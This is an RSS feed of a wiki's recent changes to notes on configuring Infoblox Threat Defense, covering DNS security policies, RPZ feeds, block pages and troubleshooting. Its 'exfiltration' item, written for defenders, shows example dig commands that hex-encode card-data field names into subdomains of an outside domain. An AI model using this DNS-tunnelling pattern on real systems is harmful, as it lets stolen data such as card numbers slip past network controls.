<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.8" -->
<?xml-stylesheet href="https://www.staffordnet.uk/lib/exe/css.php?s=feed" type="text/css"?>
<rdf:RDF
    xmlns="http://purl.org/rss/1.0/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel rdf:about="https://www.staffordnet.uk/feed.php">
        <title>Saucepan - infoblox_threat_defense</title>
        <description></description>
        <link>https://www.staffordnet.uk/</link>
        <image rdf:resource="https://www.staffordnet.uk/lib/exe/fetch.php?media=favicon.ico" />
       <dc:date>2026-04-05T18:31:37+00:00</dc:date>
        <items>
            <rdf:Seq>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:applications&amp;rev=1741017431&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:blockpage&amp;rev=1735312345&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:cisco_umbrella&amp;rev=1735312366&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:custom_lists&amp;rev=1742570102&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:dfp&amp;rev=1762961288&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:domain_mitigation&amp;rev=1735312142&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:dossier&amp;rev=1735312153&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:endpoints&amp;rev=1771123008&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:exfiltration&amp;rev=1735312937&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:external_networks&amp;rev=1735312197&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:geolocation&amp;rev=1772012820&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:internal_domains&amp;rev=1758637757&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:logging&amp;rev=1735312570&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:lookalikes&amp;rev=1735311440&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:monitoring&amp;rev=1735311466&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:palo_alto_networks&amp;rev=1744106479&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:pop&amp;rev=1746515886&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:redirect&amp;rev=1735312408&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:rpz_feeds&amp;rev=1772995432&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:sandbox&amp;rev=1735312628&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:security_policy&amp;rev=1768988466&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:test_domains&amp;rev=1751471012&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:threat_insight&amp;rev=1768987027&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:tide&amp;rev=1774997082&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:troubleshooting&amp;rev=1735313819&amp;do=diff"/>
                <rdf:li rdf:resource="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:url_filtering&amp;rev=1768987093&amp;do=diff"/>
            </rdf:Seq>
        </items>
    </channel>
    <image rdf:about="https://www.staffordnet.uk/lib/exe/fetch.php?media=favicon.ico">
        <title>Saucepan</title>
        <link>https://www.staffordnet.uk/</link>
        <url>https://www.staffordnet.uk/lib/exe/fetch.php?media=favicon.ico</url>
    </image>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:applications&amp;rev=1741017431&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-03-03T15:57:11+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>applications</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:applications&amp;rev=1741017431&amp;do=diff</link>
        <description>Infoblox Applications

Allow - Local Resolution

NIOS-X with DFP and Infoblox Endpoint can honour “Allow - Local Resolution” for Application Custom List on Security Policy. DFP MUST have a fallback resolver configured. This is because the list of applications isn&#039;t put into the</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:blockpage&amp;rev=1735312345&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:12:25+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>blockpage</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:blockpage&amp;rev=1735312345&amp;do=diff</link>
        <description>BloxOne Block Page

Certificate

The block page hosted by Infoblox uses this CA cert that the client endpoint needs to have in its trusted Root CA store in order for the page to load correctly.

Code

&lt;!DOCTYPE html&gt;
&lt;html title=&quot;infoblox-redirect-page&quot;&gt;
&lt;head&gt;
	&lt;title&gt;Authentication required&lt;/title&gt;
	&lt;link rel=&quot;icon&quot; type=&quot;image/x-icon&quot; href=&quot;/smart-proxy/resources/favicon.ico&quot; sizes=&quot;any&quot; /&gt;
	&lt;link rel=&quot;icon&quot; type=&quot;image/svg+xml&quot; href=&quot;/smart-proxy/resources/favicon.svg&quot; /&gt;
	&lt;style&gt;
		a[_ngcon…</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:cisco_umbrella&amp;rev=1735312366&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:12:46+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>cisco_umbrella</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:cisco_umbrella&amp;rev=1735312366&amp;do=diff</link>
        <description>Cisco Umbrella

From Cisco&#039;s page here and here.

Cisco Umbrella has a Monthly DNS Query Average - more data. More info in product description

With regards to blocked security domains, please note that Cisco Umbrella blocks A, AAAA, ANY, CNAME, PTR, SRV, PRIVATE, SPF/DNS, NULL, SIG, and TXT records, so queries for other record types (MX, SOA, and NS) will be allowed, even though the category is blocked.  However, requests for MX records of domains that have been categorized as</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:custom_lists&amp;rev=1742570102&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-03-21T15:15:02+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>custom_lists</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:custom_lists&amp;rev=1742570102&amp;do=diff</link>
        <description>Custom Lists

You can create 100 custom lists in any given BloxOne tenant.

Each list can have 50k entries.

A custom list containing just “example.co.uk” also blocks 

test.ftp.sip.example.co.uk

However, cache means that you might need to wait a little while for all queries to get blocked.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:dfp&amp;rev=1762961288&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-11-12T15:28:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>dfp</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:dfp&amp;rev=1762961288&amp;do=diff</link>
        <description>DFP

DFP = DNS Forward Proxy

On NIOS, you don&#039;t have to put a domain into “Internal domains” for NIOS DFP to recognize a record for a forward zone. Just creating the forward zone in NIOS is enough for NIOS to forward as required without bothering the DFP. If you put block lists on the cloud security policy for zones that NIOS forwards to, the security policies won&#039;t do anything as they are not consulted by NIOS.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:domain_mitigation&amp;rev=1735312142&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:09:02+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>domain_mitigation</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:domain_mitigation&amp;rev=1735312142&amp;do=diff</link>
        <description>Infoblox Domain Mitigation

Blog Post

Infoblox runs the CISA domain take-down service.

Infoblox provide domain monitoring and reporting to track potential threats. They also provide a takedown service.

Run by the PS team, you buy a bundle of 100 take downs.

You then use as required. The Infoblox team will take care of the rest. They follow up and keep it down for 30 days if required.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:dossier&amp;rev=1735312153&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:09:13+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>dossier</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:dossier&amp;rev=1735312153&amp;do=diff</link>
        <description>Dossier

All Dossier notes have been moved to the TIDE page.

Dossier is a front end that can take TIDE data and also include data from other sources such as WHOIS, GeoLocation, etc.

Limit of 600 API calls with ~40 requests per search per hour to make it about 30-40 searches per tenant per hour.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:endpoints&amp;rev=1771123008&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-02-15T02:36:48+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>endpoints</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:endpoints&amp;rev=1771123008&amp;do=diff</link>
        <description>Infoblox Endpoints

Best Practice

Official Best Practice

Internal Host Detection

Endpoint can be configured to detect when it is on the corporate network and thus told to not establish DoT session to Infoblox Cloud because the local DNS server will be applying DNS security.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:exfiltration&amp;rev=1735312937&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:22:17+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>exfiltration</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:exfiltration&amp;rev=1735312937&amp;do=diff</link>
        <description>Malware Examples using DNS

	*  Snugy Malware - 2020 November - Low and Slow DNS Exfiltration and C2.
	*  BellaCiao - 2023 April - Low and Slow DNS Exfiltration and C2.
	*  Medusa - 2023 May - Russian Malware Intel Report

Example

dig +short 10.181.64.161 1075.63632e747874.1.bz2oc0.txt.start.hexn.ebb569d085.thehansfamily.com
dig +short 10.181.64.161 1.49737375696e674e6574776f726b2c436172644e756d6265720d0a.bz2oc0.hexn.ebb569d085.thehansfamily.com
dig +short 10.181.64.161 2.4d6173746572436172642c…</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:external_networks&amp;rev=1735312197&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:09:57+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>external_networks</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:external_networks&amp;rev=1735312197&amp;do=diff</link>
        <description>BloxOne External Networks

When you create an external network in BloxOne Threat Defense and set a public IP range, no other customer will be able to use it.

The external network must be a CIDR between /24 and /32. For IPv6, enter a CIDR between /0 and /128.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:geolocation&amp;rev=1772012820&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-02-25T09:47:00+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>geolocation</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:geolocation&amp;rev=1772012820&amp;do=diff</link>
        <description>Infoblox Threat Defense Geolocation

Geolocation

Service providers such as Google, Infoblox, etc, will only forward ECS data to an authoratative DNS server if that domain being queried is in the list of ECS zones.

	*  For Infoblox, this list is mostly services Google, YouTube, SalesForce, Netskope, etc.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:internal_domains&amp;rev=1758637757&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-09-23T14:29:17+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>internal_domains</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:internal_domains&amp;rev=1758637757&amp;do=diff</link>
        <description>Internal Domains

Remember, the purpose of “Internal Domains” is for BloxOne Hosts that do not have BloxOne DDI enabled. NIOS already has the ability to be authoritative for domains and to a manually forward internal domains as part of NIOS DNS and so</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:logging&amp;rev=1735312570&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:16:10+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>logging</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:logging&amp;rev=1735312570&amp;do=diff</link>
        <description>Infoblox Threat Defense Logging

Details on logs from Threat Defense Cloud via the Data Connector is in the NIOS-X Logging section.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:lookalikes&amp;rev=1735311440&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T14:57:20+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>lookalikes</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:lookalikes&amp;rev=1735311440&amp;do=diff</link>
        <description>Infoblox Lookalike Domain Monitoring

After the customer adds a new custom domain to be monitored it will take effect only on newly observed data starting from the next day.

The Suspicious lookalikes RPZ feed is filled with the findings of the domains monitored.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:monitoring&amp;rev=1735311466&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T14:57:46+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>monitoring</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:monitoring&amp;rev=1735311466&amp;do=diff</link>
        <description>BloxOne Monitoring

Category filter list is here.

When searching under Reports &gt; Security Activity, you can use filters

category!=&quot;Malicious Downloads&quot;

category!=&quot;Malicious Downloads&quot; and category!=&quot;Shareware/Freeware&quot;

You can search by end point client IP</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:palo_alto_networks&amp;rev=1744106479&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-04-08T10:01:19+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>palo_alto_networks</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:palo_alto_networks&amp;rev=1744106479&amp;do=diff</link>
        <description>Palo Alto Networks DNS Security

View all STIG

DISA STIG audit rule: The Palo Alto Networks security platform must not enable the DNS proxy.

Basically, DISA is staying “Don&#039;t put all your eggs in one basket”.

The Palo Alto Networks security platform can act as a DNS proxy and send the DNS queries on behalf of the clients. DNS queries that arrive on an interface IP address can be directed to different DNS servers based on full or partial domain names.

However, unrelated or unneeded proxy serv…</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:pop&amp;rev=1746515886&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-05-06T07:18:06+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>pop</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:pop&amp;rev=1746515886&amp;do=diff</link>
        <description>BloxOne POP

List of BloxOne Points of Presence (source list and live status) 

Hint, if you have BloxOne Threat Defense AND BloxOne DDI, you can enable “Local Resolution” on your security policies. This means that the OPH will resolve the FQDN locally, and thus the nearest POP of the SaaS service you are connecting to. However, the query response is not sent to the client until it has also been passed through the BloxOne Threat Defense cloud for security checks.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:redirect&amp;rev=1735312408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:13:28+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>redirect</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:redirect&amp;rev=1735312408&amp;do=diff</link>
        <description>Infoblox Redirects

Bing No Copilot

To direct www.bing.com to nochat.bing.com

&lt;https://learn.microsoft.com/en-us/copilot/manage#require-commercial-data-protection-in&gt;-

On NIOS:

	*  You can use an RPZ to redirect www.bing.com to nochat.bing.com
	*  You can create www.bing.com as an authoratative zone and then create an ALIAS A record for the zone that points at nochat.bing.com</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:rpz_feeds&amp;rev=1772995432&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-03-08T18:43:52+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>rpz_feeds</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:rpz_feeds&amp;rev=1772995432&amp;do=diff</link>
        <description>Infoblox RPZ Threat Feeds

Official list of Infoblox Threat Feeds

Feed Revamp for NIOS

Test data here.

Some OpenSource feeds here.

ISC Guide to RPZ Deployment.

Best Practice

Official best practice.

Precedence: If you have a security policy at the top of the policy list (i.e. highest precedence), then if there is a DFP or an active Endpoint in that site or a DoH client, they will get processed by that security policy rather than the security policy they are actually aligned to further down…</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:sandbox&amp;rev=1735312628&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:17:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>sandbox</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:sandbox&amp;rev=1735312628&amp;do=diff</link>
        <description>Infoblox Threat Defense Sandbox

Details on Infoblox Sandbox for Threat Defense are in the NIOS-X Sandbox section.</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:security_policy&amp;rev=1768988466&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-01-21T09:41:06+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>security_policy</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:security_policy&amp;rev=1768988466&amp;do=diff</link>
        <description>Security Policy

When you have “Local On-Prem Resolution” AND “Block DNS rebinding attacks” enabled on a security policy, then any NIOS-X or NIOS-X-as-a-Service instance that has conditional forwarding to on-prem servers that respond to internal domains with RFC1918 addresses will be blocked. This would also apply if NIOS-X was doing a global forwarder to a</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:test_domains&amp;rev=1751471012&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-07-02T15:43:32+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>test_domains</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:test_domains&amp;rev=1751471012&amp;do=diff</link>
        <description>Infoblox Test Domains

Third Party Malware Domains

	*  &lt;https://urlhaus.abuse.ch/?ref=techblog.nexxwave.eu&gt;
	*  &lt;https://cert.pl/en/warning-list/&gt;
	*  &lt;https://zonefiles.io/compromised-domain-list/&gt;

Infoblox Test Domains

Domains that can be used for testing RPZ / Feed configuration.
 Domain  Property  Threat Level  RPZ (Links to CSP page)  antimalware.eicar.network  MalwareC2_Generic</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:threat_insight&amp;rev=1768987027&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-01-21T09:17:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>threat_insight</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:threat_insight&amp;rev=1768987027&amp;do=diff</link>
        <description>Threat Insight

Page on types of Threat Insight events in cloud here.

A nice blog post on Infoblox&#039;s TI detection here.

In the cloud portal, the Exfiltration custom list will show a description that says why a domain was flagged as exfiltration. This may include</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:tide&amp;rev=1774997082&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-03-31T22:44:42+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>tide</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:tide&amp;rev=1774997082&amp;do=diff</link>
        <description>TIDE

TIDE is Threat Intelligence Data Exchange. It is effectively a very large Threat Database that is managed by the Infoblox Threat Intelligence Team. From its database, the Infoblox RPZ feeds are generated.

NOTE: When you add indicators via TIDE, be aware that the associated RPZ feed will filter out anything that is in Infoblox&#039;s internal Global Allow list (e.g. brave[.]com)</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:troubleshooting&amp;rev=1735313819&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-12-27T15:36:59+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>troubleshooting</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:troubleshooting&amp;rev=1735313819&amp;do=diff</link>
        <description>Infoblox Threat Defense Troubleshooting

DIG

The thing to know about BloxOne Threat Defense is that you can use DIG to get data on what is being resolved using 

dig @52.119.41.100 &lt;DOMAIN_YOU_WANT_DATA_ON&gt;.debug.infoblox.com ch txt

DOMAIN=google.com
dig @52.119.41.100 $DOMAIN.debug.infoblox.com ch txt | grep Ident | sed s/\&quot;/\\n/g | grep CAT
dig @52.119.41.100 $DOMAIN.debug.infoblox.com ch txt | grep Ident | sed s/\&quot;/\\n/g | grep APP</description>
    </item>
    <item rdf:about="https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:url_filtering&amp;rev=1768987093&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2026-01-21T09:18:13+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>url_filtering</title>
        <link>https://www.staffordnet.uk/doku.php?id=infoblox_threat_defense:url_filtering&amp;rev=1768987093&amp;do=diff</link>
        <description>Threat Defense URL Filtering

When Infoblox filters a DNS name, it returns one of the following IP addresses

52.4.105.248

3.215.231.251

35.168.95.233

When you go to this IP, you will see the Infoblox block page.

ByPasscodes will redirect users to</description>
    </item>
</rdf:RDF>
